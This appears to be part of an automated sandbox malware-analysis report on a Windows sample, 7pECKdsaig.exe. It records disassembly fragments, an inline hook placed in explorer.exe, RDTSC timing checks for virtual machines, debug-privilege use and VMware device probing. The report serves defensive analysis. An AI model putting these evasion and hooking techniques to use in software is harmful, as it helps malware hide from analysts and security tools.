Source:	Binary string: wntdll.pdb source: 7pECKdsaig.exe, 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: msdt.pdb source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9798E push cs; retf	0_2_00A979AB
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9719C push esp; retf	0_2_00A971D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A979D3 push esi; ret	0_2_00A979F3
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A96911 push edi; ret	0_2_00A96912
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9F110 push ecx; ret	0_2_00A9F125
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9D4A5 push eax; ret	0_2_00A9D4F8
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9D4FB push eax; ret	0_2_00A9D562
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9D4F2 push eax; ret	0_2_00A9D4F8
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_00A9D55C push eax; ret	0_2_00A9D562
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0176D0D1 push ecx; ret	0_2_0176D0E4
Source: C:\Windows\explorer.exe	Code function: 1_2_0E176B1E push esp; retn 0000h	1_2_0E176B1F
Source: C:\Windows\explorer.exe	Code function: 1_2_0E176B02 push esp; retn 0000h	1_2_0E176B03
Source: C:\Windows\explorer.exe	Code function: 1_2_0E1769B5 push esp; retn 0000h	1_2_0E176AE7
Source: C:\Windows\explorer.exe	Code function: 1_2_100DBB02 push esp; retn 0000h	1_2_100DBB03
Source: C:\Windows\explorer.exe	Code function: 1_2_100DBB1E push esp; retn 0000h	1_2_100DBB1F
Source: C:\Windows\explorer.exe	Code function: 1_2_100DB9B5 push esp; retn 0000h	1_2_100DBAE7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_04B1D0D1 push ecx; ret	2_2_04B1D0E4
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059E158 push 150B24F0h; iretd	2_2_0059E15F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059F11E push ecx; ret	2_2_0059F125
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_00596911 push edi; ret	2_2_00596912
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_005979D3 push esi; ret	2_2_005979F3
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059719C push esp; retf	2_2_005971D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059798E push cs; retf	2_2_005979AB
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059E224 pushfd ; ret	2_2_0059E22A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059D4FB push eax; ret	2_2_0059D562
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059D4F2 push eax; ret	2_2_0059D4F8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059D4A5 push eax; ret	2_2_0059D4F8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 2_2_0059D55C push eax; ret	2_2_0059D562

Source: initial sample

Static PE information: section name: .text entropy: 7.409588215160137

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xE1

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\7pECKdsaig.exe	RDTSC instruction interceptor: First address: 0000000000A89904 second address: 0000000000A8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7pECKdsaig.exe	RDTSC instruction interceptor: First address: 0000000000A89B6E second address: 0000000000A89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 0000000000589904 second address: 000000000058990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe	RDTSC instruction interceptor: First address: 0000000000589B6E second address: 0000000000589B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_1-13950

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\7pECKdsaig.exe

Code function: 0_2_00A89AA0 rdtsc

0_2_00A89AA0

Source: C:\Windows\explorer.exe

Window / User API: foregroundWindowGot 865

Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

API coverage: 9.7 %

Source: C:\Users\user\Desktop\7pECKdsaig.exe

Process information queried: ProcessInformation

Jump to behavior

Source: explorer.exe, 00000001.00000003.289061192.00000000084D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000003.461296315.000000000683A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.263735895.00000000081DD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
Source: explorer.exe, 00000001.00000002.523833052.0000000006710000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: explorer.exe, 00000001.00000003.461216185.000000000F53F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.530259036.000000000F54E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: explorer.exe, 00000001.00000000.263735895.0000000008304000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000003.462488828.00000000084D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @%SystemRoot%\System32\mswsock.dll,-60101a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir~
Source: explorer.exe, 00000001.00000000.263735895.00000000082B2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
Source: explorer.exe, 00000001.00000002.525713546.00000000082B2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000001.00000002.525713546.0000000008200000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&

Source: C:\Users\user\Desktop\7pECKdsaig.exe

Code function: 0_2_00A89AA0 rdtsc

0_2_00A89AA0

Source: C:\Users\user\Desktop\7pECKdsaig.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171B171 mov eax, dword ptr fs:[00000030h]	0_2_0171B171
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171B171 mov eax, dword ptr fs:[00000030h]	0_2_0171B171
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171C962 mov eax, dword ptr fs:[00000030h]	0_2_0171C962
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0173B944 mov eax, dword ptr fs:[00000030h]	0_2_0173B944
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0173B944 mov eax, dword ptr fs:[00000030h]	0_2_0173B944
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174513A mov eax, dword ptr fs:[00000030h]	0_2_0174513A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174513A mov eax, dword ptr fs:[00000030h]	0_2_0174513A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h]	0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h]	0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h]	0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01734120 mov eax, dword ptr fs:[00000030h]	0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01734120 mov ecx, dword ptr fs:[00000030h]	0_2_01734120
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01719100 mov eax, dword ptr fs:[00000030h]	0_2_01719100
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01719100 mov eax, dword ptr fs:[00000030h]	0_2_01719100
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01719100 mov eax, dword ptr fs:[00000030h]	0_2_01719100
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171B1E1 mov eax, dword ptr fs:[00000030h]	0_2_0171B1E1
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171B1E1 mov eax, dword ptr fs:[00000030h]	0_2_0171B1E1
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171B1E1 mov eax, dword ptr fs:[00000030h]	0_2_0171B1E1
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017A41E8 mov eax, dword ptr fs:[00000030h]	0_2_017A41E8
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h]	0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h]	0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h]	0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017951BE mov eax, dword ptr fs:[00000030h]	0_2_017951BE
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017461A0 mov eax, dword ptr fs:[00000030h]	0_2_017461A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017461A0 mov eax, dword ptr fs:[00000030h]	0_2_017461A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017969A6 mov eax, dword ptr fs:[00000030h]	0_2_017969A6
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01742990 mov eax, dword ptr fs:[00000030h]	0_2_01742990
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174A185 mov eax, dword ptr fs:[00000030h]	0_2_0174A185
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0173C182 mov eax, dword ptr fs:[00000030h]	0_2_0173C182
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E1074 mov eax, dword ptr fs:[00000030h]	0_2_017E1074
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017D2073 mov eax, dword ptr fs:[00000030h]	0_2_017D2073
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01730050 mov eax, dword ptr fs:[00000030h]	0_2_01730050
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01730050 mov eax, dword ptr fs:[00000030h]	0_2_01730050
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h]	0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h]	0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h]	0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0172B02A mov eax, dword ptr fs:[00000030h]	0_2_0172B02A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h]	0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h]	0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h]	0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h]	0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174002D mov eax, dword ptr fs:[00000030h]	0_2_0174002D
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E4015 mov eax, dword ptr fs:[00000030h]	0_2_017E4015
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E4015 mov eax, dword ptr fs:[00000030h]	0_2_017E4015
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01797016 mov eax, dword ptr fs:[00000030h]	0_2_01797016
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01797016 mov eax, dword ptr fs:[00000030h]	0_2_01797016
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01797016 mov eax, dword ptr fs:[00000030h]	0_2_01797016
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017158EC mov eax, dword ptr fs:[00000030h]	0_2_017158EC
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h]	0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017AB8D0 mov ecx, dword ptr fs:[00000030h]	0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h]	0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h]	0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h]	0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017AB8D0 mov eax, dword ptr fs:[00000030h]	0_2_017AB8D0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174F0BF mov ecx, dword ptr fs:[00000030h]	0_2_0174F0BF
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174F0BF mov eax, dword ptr fs:[00000030h]	0_2_0174F0BF
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174F0BF mov eax, dword ptr fs:[00000030h]	0_2_0174F0BF
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h]	0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h]	0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h]	0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h]	0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h]	0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017420A0 mov eax, dword ptr fs:[00000030h]	0_2_017420A0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017590AF mov eax, dword ptr fs:[00000030h]	0_2_017590AF
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01719080 mov eax, dword ptr fs:[00000030h]	0_2_01719080
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01793884 mov eax, dword ptr fs:[00000030h]	0_2_01793884
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01793884 mov eax, dword ptr fs:[00000030h]	0_2_01793884
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01743B7A mov eax, dword ptr fs:[00000030h]	0_2_01743B7A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01743B7A mov eax, dword ptr fs:[00000030h]	0_2_01743B7A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171DB60 mov ecx, dword ptr fs:[00000030h]	0_2_0171DB60
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E8B58 mov eax, dword ptr fs:[00000030h]	0_2_017E8B58
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171F358 mov eax, dword ptr fs:[00000030h]	0_2_0171F358
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171DB40 mov eax, dword ptr fs:[00000030h]	0_2_0171DB40
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017D131B mov eax, dword ptr fs:[00000030h]	0_2_017D131B
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h]	0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h]	0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h]	0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h]	0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h]	0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017403E2 mov eax, dword ptr fs:[00000030h]	0_2_017403E2
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0173DBE9 mov eax, dword ptr fs:[00000030h]	0_2_0173DBE9
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017953CA mov eax, dword ptr fs:[00000030h]	0_2_017953CA
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017953CA mov eax, dword ptr fs:[00000030h]	0_2_017953CA
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01744BAD mov eax, dword ptr fs:[00000030h]	0_2_01744BAD
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01744BAD mov eax, dword ptr fs:[00000030h]	0_2_01744BAD
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01744BAD mov eax, dword ptr fs:[00000030h]	0_2_01744BAD
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E5BA5 mov eax, dword ptr fs:[00000030h]	0_2_017E5BA5
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01742397 mov eax, dword ptr fs:[00000030h]	0_2_01742397
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174B390 mov eax, dword ptr fs:[00000030h]	0_2_0174B390
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017D138A mov eax, dword ptr fs:[00000030h]	0_2_017D138A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017CD380 mov ecx, dword ptr fs:[00000030h]	0_2_017CD380
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01721B8F mov eax, dword ptr fs:[00000030h]	0_2_01721B8F
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01721B8F mov eax, dword ptr fs:[00000030h]	0_2_01721B8F
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0175927A mov eax, dword ptr fs:[00000030h]	0_2_0175927A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017CB260 mov eax, dword ptr fs:[00000030h]	0_2_017CB260
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017CB260 mov eax, dword ptr fs:[00000030h]	0_2_017CB260
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017E8A62 mov eax, dword ptr fs:[00000030h]	0_2_017E8A62
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017DEA55 mov eax, dword ptr fs:[00000030h]	0_2_017DEA55
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017A4257 mov eax, dword ptr fs:[00000030h]	0_2_017A4257
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h]	0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h]	0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h]	0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01719240 mov eax, dword ptr fs:[00000030h]	0_2_01719240
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01754A2C mov eax, dword ptr fs:[00000030h]	0_2_01754A2C
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01754A2C mov eax, dword ptr fs:[00000030h]	0_2_01754A2C
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01715210 mov eax, dword ptr fs:[00000030h]	0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01715210 mov ecx, dword ptr fs:[00000030h]	0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01715210 mov eax, dword ptr fs:[00000030h]	0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01715210 mov eax, dword ptr fs:[00000030h]	0_2_01715210
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171AA16 mov eax, dword ptr fs:[00000030h]	0_2_0171AA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0171AA16 mov eax, dword ptr fs:[00000030h]	0_2_0171AA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017DAA16 mov eax, dword ptr fs:[00000030h]	0_2_017DAA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017DAA16 mov eax, dword ptr fs:[00000030h]	0_2_017DAA16
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01733A1C mov eax, dword ptr fs:[00000030h]	0_2_01733A1C
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01728A0A mov eax, dword ptr fs:[00000030h]	0_2_01728A0A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01742AE4 mov eax, dword ptr fs:[00000030h]	0_2_01742AE4
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_01742ACB mov eax, dword ptr fs:[00000030h]	0_2_01742ACB
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0172AAB0 mov eax, dword ptr fs:[00000030h]	0_2_0172AAB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0172AAB0 mov eax, dword ptr fs:[00000030h]	0_2_0172AAB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174FAB0 mov eax, dword ptr fs:[00000030h]	0_2_0174FAB0
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h]	0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h]	0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h]	0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h]	0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_017152A5 mov eax, dword ptr fs:[00000030h]	0_2_017152A5
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174D294 mov eax, dword ptr fs:[00000030h]	0_2_0174D294
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0174D294 mov eax, dword ptr fs:[00000030h]	0_2_0174D294
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 0_2_0173C577 mov eax, dword ptr fs:[00000030h]	0_2_0173C577
